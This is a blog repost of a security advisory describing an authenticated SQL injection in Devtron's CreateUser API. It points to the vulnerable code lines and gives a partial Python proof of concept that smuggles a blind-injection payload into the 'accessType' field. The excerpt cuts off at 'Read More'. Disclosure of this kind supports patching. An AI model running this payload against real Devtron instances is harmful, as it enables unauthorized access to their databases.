Site icon API Security Blog

Devtron has SQL Injection in CreateUser API

image
Summary An authenticated user (with minimum permission) could utilize and exploit SQL Injection to allow the execution of malicious SQL queries via CreateUser API (/orchestrator/user). Details The API is CreateUser (/orchestrator/user). The function to read user input is: https://github.com/devtron-labs/devtron/blob/4296366ae288f3a67f87e547d2b946acbcd2dd65/api/auth/user/UserRestHandler.go#L96-L104 The userInfo (line 104) parameter can be controlled by users. The SQL injection can happen in the code: https://github.com/devtron-labs/devtron/blob/4296366ae288f3a67f87e547d2b946acbcd2dd65/pkg/auth/user/repository/UserAuthRepository.go#L1038 The query (line 1038) parameter can be controlled by a user to create and execute a malicious SQL query. The user should be authenticated but only needs minimum permissions: PoC Demonstrate a blind SQL injection to retrieve the database name: “` import requests import time import string import argparse def blind(ip, token, query): url = f"https://{ip}/orchestrator/user" headers = {"token": token} entity = "chart-group" payload = f"'; {query} –" data = {"id": 111, "email_id": "abcd123@126.com", "superAdmin": False, "roleFilters":[{"team":"", "environment":"", "action": "", "entity": entity, "accessType": payload}]} #"EntityName": "test", "AccessType": "test", "Cluster": "","NameSpace": "devtroncd", "Group": "", "Kind": "", "Resource": "", "Workflow": "" start = time.time() res = requests.post(url, headers=headers, json =…Read More

Exit mobile version